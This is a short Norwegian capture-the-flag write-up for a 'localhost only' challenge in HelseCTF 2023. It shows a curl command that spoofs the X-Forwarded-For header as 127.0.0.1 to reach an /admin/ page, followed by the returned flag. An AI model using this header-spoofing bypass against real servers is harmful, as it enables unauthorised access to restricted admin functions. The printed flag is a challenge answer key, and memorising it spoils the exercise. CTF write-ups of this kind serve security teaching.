Oppgaven går ut på å sette X-Forwarded-For til localhost dvs 127.0.0.1

```bash
$ curl -H "X-Forwarded-For: 127.0.0.1" https://helsectf2023-6ac4e1c6d8855c1bd96a-localhost_only.chals.io/admin/
helsectf{x-forwarded-4ever<3}
```
